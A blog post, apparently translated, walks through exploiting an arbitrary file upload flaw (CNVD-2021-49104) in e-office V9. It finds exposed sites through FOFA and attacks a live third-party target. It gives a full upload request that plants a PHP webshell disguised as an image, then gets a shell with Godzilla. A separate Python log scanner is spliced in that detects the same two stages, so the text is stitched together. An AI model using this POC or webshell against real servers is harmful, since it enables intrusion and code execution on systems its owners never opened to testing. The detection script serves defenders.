Upload an e-office V9 arbitrary file [vulnerability recurrence practice]
2022-07-07 08:37:00 【It old culvert】
I. Preface
Any direct or indirect consequences and losses caused by disseminating or using the information provided in this article are solely the responsibility of the user; the author of this article bears no responsibility for them.
The vulnerabilities in this article were all collected from public sources. If any content in the article touches on sensitive material, please contact the author promptly; your understanding is appreciated.
II. Vulnerability principle
The vulnerability reproduced here is CNVD-2021-49104, which had not been publicly detailed at the time. It exists because the upload module of e-office does not properly handle part of the user input: an attacker can construct a malicious upload request and achieve arbitrary code execution.
The following figure shows the code snippet related to the vulnerability.
Figure 1: Vulnerability code snippet
In the affected source code, when the uploadType parameter is set to eoffice_logo, no verification is performed on the uploaded file at all, which allows an arbitrary file to be uploaded.
III. Vulnerability reproduction in practice
1. Information gathering
Use FOFA to collect web sites running E-office.
Figure 2: FOFA information gathering
2. Select the reproduction target
Take the XX website as an example.
Figure 3: OA E-office interface
3. Construct the POC
Use Burp Suite to intercept the request and modify it in Repeater. The packet is constructed as follows.
POC:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:7899
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i
Figure 4: Burp Suite Repeater
Looking at the Burp response, the file name is echoed back: the file was uploaded successfully as logo-eoffice.php.
4. Verify the vulnerability and get a shell
After uploading, access the following path: http://???/images/logo/logo-eoffice.php
Figure 5: Accessing the file path
Use the Godzilla tool to connect to the shell.
Figure 6: Godzilla getshell
Executing a command works normally; the shell was obtained successfully.
Figure 7: Command execution
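For defenders, the two stages described above (the upload request with uploadType=eoffice_logo, then a request for a .php file under /images/logo/) leave a clear trace in web-server access logs. The following is an added example, not code from the original post or from e-office: the log lines are constructed, and the combined-log-format regex is an assumption about how your server writes its access log.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (combined log format). IPs, timestamps
# and sizes are made up for this example; the paths are the ones from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2022:08:37:00 +0800] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1" 200 22 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2022:08:37:05 +0800] "GET /images/logo/logo-eoffice.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Jul/2022:08:40:00 +0800] "GET /images/logo/logo-eoffice.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Jul/2022:08:41:00 +0800] "GET /general/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Assumed combined log format: client, ident, user, [timestamp], "METHOD PATH PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line: str) -> Dict[str, str]:
    """Parse one access-log line into its fields; empty dict if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}

def classify(entry: Dict[str, str]) -> Optional[str]:
    """Label an entry if it matches either stage of the activity described in the post."""
    url, _, query = entry["path"].partition("?")
    params = dict(p.split("=", 1) if "=" in p else (p, "") for p in query.split("&") if p)
    # Stage 1: the upload endpoint called with the unchecked uploadType value.
    if (entry["method"] == "POST"
            and url.endswith("/general/index/UploadFile.php")
            and params.get("uploadType") == "eoffice_logo"):
        return "upload-eoffice_logo"
    # Stage 2: a PHP file being requested from the logo image directory.
    if url.startswith("/images/logo/") and url.lower().endswith(".php"):
        return "php-under-images-logo"
    return None

def scan(log_text: str) -> List[Dict[str, str]]:
    """Return the suspicious entries (ip, timestamp, path, label) found in the log text."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        label = classify(entry)
        if label:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "path": entry["path"], "label": label})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["label"], f["path"])
```

Treat a stage-1 hit followed by a stage-2 hit from the same client as a high-confidence indicator, and review the /images/logo/ directory for any file that is not an image.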
IV. Summary
This article briefly introduced the principle of the vulnerability and walked through its reproduction in practice.